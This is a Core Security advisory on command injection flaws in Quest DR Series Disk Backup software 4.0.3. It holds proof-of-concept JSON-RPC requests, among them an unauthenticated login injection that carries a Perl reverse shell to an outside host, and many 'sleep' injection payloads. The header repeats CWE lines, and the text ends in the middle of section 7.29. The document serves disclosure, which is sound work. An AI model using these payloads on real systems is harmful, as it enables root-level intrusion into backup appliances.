[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146,
CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150,
CVE-2018-11151,
CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155,
CVE-2018-11156,
CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160,
CVE-2018-11161,
CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165,
CVE-2018-11166,
CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170,
CVE-2018-11171,
CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175,
CVE-2018-11176,
CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180,
CVE-2018-11181,
CVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185,
CVE-2018-11186,
CVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190,
CVE-2018-11191,
CVE-2018-11192, CVE-2018-11193, CVE-2018-11194

3. *Vulnerability Description*

Quest’s website states that:

“The Quest DR Series of disk backup appliances [1] are engineered to handle
hundreds of incoming backup streams with an all-inclusive software solution
that simplifies management of backups, giving you more time to focus on
other tasks.

The appliances work in conjunction with backup software applications to
ensure data written to disks is protected for reliable recovery. New
features such as storage groups, secure erase and user management give you
the flexibility to tailor utilization policies to fit your organization’s
specific requirements.

With Quest DR Series appliances, you can:

– Back up more of your servers and applications – with support for more
than 15 backup applications and enhanced security features such as
encryption at rest and secure erase.

– Store less backup data – using variable block, in-line deduplication
and compression to lower backup storage requirements by an average of
20:1 at an average cost of $.05 – $.17/GB.

– Perform better during data ingest and management – with built-in
accelerators, logical storage groups and support for Fibre Channel
connectivity and virtual tape libraries (VTLs).”

Multiple vulnerabilities were found in the Quest DR Series Disk Backup
software that would allow remote attackers to execute arbitrary system
commands on the appliance with root permissions.

Note: This advisory has limited details on the vulnerabilities because
during an attempted coordinated disclosure process for other advisory,
Quest advised us not to distribute our original findings to the public or
else they would take legal action.
Quest’s definition of “responsible disclosure” can be found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is
ready and available when the vulnerability details are publicized. We
believe that providing technical details about each finding is necessary
to provide users and organizations with enough information to understand
the implications of the vulnerabilities against their environment and,
most importantly, to prioritize the remediation activities aiming at
mitigating risk.

We regret Quest’s posture on disclosure and the lack of a possibility of
engaging into a coordinated publication date, something we achieve (and
have achieved) with many vendors as part of our coordinated disclosure
practices.

4. *Vulnerable Packages*

. Quest DR Series Disk Backup Software 4.0.3
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest has released the build 4.0.3.1 that address the reported
vulnerabilities.
Build can be download at:

. For DR4300e, DR4300, and DR6300:
https://support.quest.com/download-install-detail/6085865
. For DR4000, DR4100, DR6000:
https://support.quest.com/download-install-detail/6085802

For more details, Quest published the following Release Note:
https://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/

6. *Credits*

These vulnerabilities were discovered and researched by Maximiliano
Vidal from Core
Security Consulting Services. The publication of this advisory was
coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Multiple command injection vulnerabilities were found in the DR
appliance software,
which provides a web interface to manage system configuration. Clients
make use of
the site features via its exposed JSON-RPC API.

The product does only provide SSH access to
administrators inside a restricted rbash environment. Administrators are
able
to execute a small number of utilities that are mostly replicated in the
web console.

We present the most critical issue in section 7.1, which would allow a
remote
unauthenticated attacker to execute arbitrary system commands.

Sections 7.2 to 7.46 describe other command injection vectors that
require the attacker
to have a valid authentication token.

Finally, six privilege escalation vulnerabilities are described from
section 7.47
to 7.52 that would allow an attacker executing commands as the web
server user
to gain root privileges. Exploiting any of the command injection
vulnerabilities
would grant the attacker the initial foothold from where to escalate to
root.

7.1. *Unauthenticated command injection on login*

[CVE-2018-11143]
The ‘Logon’ method is in charge of processing login requests. It is
possible for an unauthenticated attacker to execute arbitrary commands
via the ‘Password’ parameter.

The following proof of concept opens a reverse shell connection to
192.168.1.36 on port 12345 musing Perl. The username must point to an
existing account on the system, so we set it to the hardcoded administrator
account that ships with the product.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 336
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “Logon”,
“params”: {
“UserName”: “administrator”,
“Password”: “‘;perl -e ‘use
Socket;$i=\”192.168.1.36\”;$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh
-i\”);};’;echo ‘”
},
“id”: 1
}
—–/

If Active Directory support is configured, then the attacker would also
be able to inject arbitrary commands into the username field.

7.2. *Command injection in the user update method*

[CVE-2018-11144]
An authenticated attacker can craft the values of various user update
properties to execute arbitrary commands on the system.

The following proof of concept injects a ‘sleep’ command in the ‘oldName’
parameter.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 158
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “update”,
“params”: {
“classname”: “DRUsers”,
“user”: {
“oldName”: “;sleep 10; echo”,
“Name”: “pepito”,
“oldRoles”: [“PepitoRole”]
}
},
“id”: 1
}
—–/

7.3. *Command injection in the user delete method*

[CVE-2018-11145]
An attacker would be able to inject system commands in the ‘user’ parameter
passed to the ‘delete’ method.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 102
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DRUsers”,
“user”: “;sleep 10; echo “
},
“id”: 1
}
—–/

7.4. *Command injection in the set user password method*

[CVE-2018-11146]
Both the ‘update_pw’ and ‘setAdminPassword’ methods can be abused to
execute arbitrary system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “update_pw”,
“params”: {
“classname”: “DRUsers”,
“user”: {
“Roles”: [“PepeRole”],
“Name”: “;sleep 10; echo “
}
},
“id”: 1
}
—–/

7.5. *Command injection in the add_new_container method*

[CVE-2018-11147]
Data backed up to DR Series appliances are handled as virtual shares or
containers.

The proof of concept injects a ‘sleep’ command in the ‘c_name’ parameter
passed to the vulnerable ‘add_new_container’ method.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 142
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “add_new_container”,
“params”: {
“classname”: “DRContainers”,
“connection_type”: 5,
“c_name”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.6. *Command injection in the update_container method*

[CVE-2018-11148]
The method in charge of updating containers is also vulnerable to command
injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 141
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “update_container”,
“params”: {
“classname”: “DRContainers”,
“connection_type”: 5,
“c_name”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.7. *Command injection in the setCleaner method*

[CVE-2018-11149]
The DR series administrator guide recommends performing scheduled disk
space reclamation operations as a method for recovering disk space from
the system. The subroutine in charge of setting this schedule was found
to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 124
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “setCleaner”,
“params”: {
“classname”: “DRSchedules”,
“schedules”: [{
“day”: “; sleep 10; #”
}]
},
“id”: 1
}
—–/

7.8. *Command injection in the setReplication method*

[CVE-2018-11150]
The DR Series system uses an active form of replication that lets you
configure a primary-backup scheme. The subroutine in charge of configuring
the replication schedule was found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 117
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “setReplication”,
“params”: {
“classname”: “DRSchedules”,
“container”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.9. *Command injection in the setResetOptions method*

[CVE-2018-11151]
The DR series system GUI allows an administrator to configure password
reset options, which is basically enabling or disabling the ‘Forgot your
password’ link on the logon page. The subroutine that implements this
functionality was found to be vulnerable to command injection via the
‘admin_email’ and ‘relay_host’ request parameters.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “setResetOptions”,
“params”: {
“classname”: “DRPassword”,
“admin_email”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.10. *Command injection in the set_compression method*

[CVE-2018-11152]
The appliance allows configuring several compression levels for each
storage group. The subroutine that sets the level of compression was
found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 127
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set_compression”,
“params”: {
“classname”: “DRCompression”,
“compressionLevel”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.11. *Command injection in the license delete method*

[CVE-2018-11153]
The JSON-RPC API exposes several methods to operate with system licenses,
several of which are vulnerable to command injection issues. The ‘delete’
subroutine can be exploited by crafting the value of the ‘serviceTag’
request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DRLicense”,
“serviceTag”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.12. *Command injection in the registerDR2000v method*

[CVE-2018-11154]
The ‘registerDR2000v’ method is part of the licensing system. This
subroutine is vulnerable to command injection via the ‘LicenseServer’,
‘AdminName’, ‘Email’, ‘CompanyName’ and ‘Comments’ request parameters.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 133
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “registerDR2000v”,
“params”: {
“classname”: “DRLicense”,
“dr2000v”: {
“LicenseServer”: “; sleep 10; #”
}
},
“id”: 1
}
—–/

7.13. *Command injection in the updateRegisterDR2000v method*

[CVE-2018-11155]
The ‘updateRegisterDR2000v’ subroutine is yet another vulnerable method
offered by the license management API.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 139
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “updateRegisterDR2000v”,
“params”: {
“classname”: “DRLicense”,
“dr2000v”: {
“LicenseServer”: “; sleep 10; #”
}
},
“id”: 1
}

—–/
7.14. *Command injection in the email relay host update method*

[CVE-2018-11156]
The appliance can be configured to use an external mail server for sending
email alerts. The subroutine implementing this functionality was found to
be vulnerable to command injection via the ‘hostname’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “update”,
“params”: {
“classname”: “DREmailRelayHost”,
“hostname”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.15. *Command injection in the join domain method*

[CVE-2018-11157]
A DR series system can be joined to a Microsoft Active Directory Services
domain. This functionality is exposed by the ‘ActiveDirectoryService’
module.
An attacker can inject system commands in the ‘domain’ parameter passed to
the ‘join’ method.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 152
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “join”,
“params”: {
“classname”: “DRActiveDirectory”,
“username”: “pepe”,
“password”: “pepito”,
“domain”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.16. *Command injection in the add storage method*

[CVE-2018-11158]
The storage service module offers support for managing storage devices.
The ‘add’ method was found to be vulnerable.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “add”,
“params”: {
“classname”: “DRStorage”,
“service_tag”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.17. *Command injection in the get_storage_group_statistics method*

[CVE-2018-11159]
The application provides usage statistics for each storage group, such
as capacity used, compression status, inode count, etc. In particular,
the ‘group’ parameter passed to the ‘get_storage_group_statistics’ is not
sanitized, allowing system commands to be injected.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “get_storage_group_statistics”,
“params”: {
“classname”: “DRStorageGroup”,
“group”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.18. *Command injection in the create storage group method*

[CVE-2018-11160]
The subroutine that allows adding a new storage group was found to be
vulnerable to command injection. An attacker can inject system commands
on various request parameters, such as ‘Compression_mode’ and ‘passphrase’.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “create”,
“params”: {
“classname”: “DRStorageGroup”,
“group”: {
“Compression_mode”: “; sleep 10; #”
}
},
“id”: 1
}
—–/

7.19. *Command injection in the delete storage group method*

[CVE-2018-11161]
The ‘delete’ subroutine in the ‘StorageGroupService’ module passes user
generated input to the ‘storage_group’ system binary without sanitization,
which allows an attacker to inject system commands via the ‘name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DRStorageGroup”,
“name”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.20. *Command injection in the update storage group method*

[CVE-2018-11162]
Several request parameters are taken from the ‘newGroup’ dictionary when
updating a storage group and used as components of a command string without
any sanitization taking place.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 159
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “update”,
“params”: {
“classname”: “DRStorageGroup”,
“newGroup”: {
“Name”: “; sleep 10; #”,
“Compression_mode”: “pepecomprimido”
}
},
“id”: 1
}
—–/

7.21. *Command injection in the set contact information method*

[CVE-2018-11163]
The GUI provides functionality to set the administrator contact information.
The ‘relay_host’ parameter is used as provided in the construction of a
command line string, therefore allowing attackers to inject system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 143
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set”,
“params”: {
“classname”: “DRContactInformation”,
“action”: “email_alerts”,
“relay_host”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.22. *Command injection in the generate diagnostics method*

[CVE-2018-11164]
The diagnostics page allows users to generate diagnostic logs that capture
the state of the system. An attacker authenticated within the web
application
can inject arbitrary system commands by crafting the value of the ‘type’
request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “generate”,
“params”: {
“classname”: “DRDiagnostics”,
“type”: “; sleep 15; #”
},
“id”: 1
}
—–/

7.23. *Command injection in the delete diagnostics method*

[CVE-2018-11165]
The ‘delete’ diagnostics functionality was found to be vulnerable to command
injection via the ‘file_name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DRDiagnostics”,
“file_name”: “; sleep 15; #”
},
“id”: 1
}
—–/

7.24. *Command injection in the rescan_replica_VTL_container method*

[CVE-2018-11166]
The subroutine in charge of rescanning a VTL container replica was found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 133
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “rescan_replica_VTL_container”,
“params”: {
“classname”: “DRReplications”,
“cname”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.25. *Command injection in the activate_replica_VTL_container method*

[CVE-2018-11167]
The subroutine in charge of activating a VTL container was found to be
vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 136
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “activate_replica_VTL_container”,
“params”: {
“classname”: “DRReplications”,
“cname”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.26. *Command injection in the deactivate_replica_VTL_container method*

[CVE-2018-11168]
The subroutine in charge of deactivating a VTL container was also found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “deactivate_replica_VTL_container”,
“params”: {
“classname”: “DRReplications”,
“cname”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.27. *Command injection in the start replication method*

[CVE-2018-11169]
The ‘start’ replication subroutine implements the logic to perform a
replication in an existing storage replication relationship. Arbitrary
command execution can be achieved via the ‘name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “start”,
“params”: {
“classname”: “DRReplications”,
“name”: “‘; sleep 15; #”
},
“id”: 1
}
—–/

7.28. *Command injection in the stop replication method*

[CVE-2018-11170]
The ‘stop’ replication functionality was also found to be vulnerable to
command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “stop”,
“params”: {
“classname”: “DRReplications”,
“name”: “‘; sleep 15; #”
},
“id”: 1
}
—–/

7.29. *Command injection in the delete replication method*

[CVE-2018-11171]
Deleting a replicaton is yet another way in which authenticated attackers
could abuse the ‘ReplicationsService’ module in order to execute system
commands in the context of the web application.

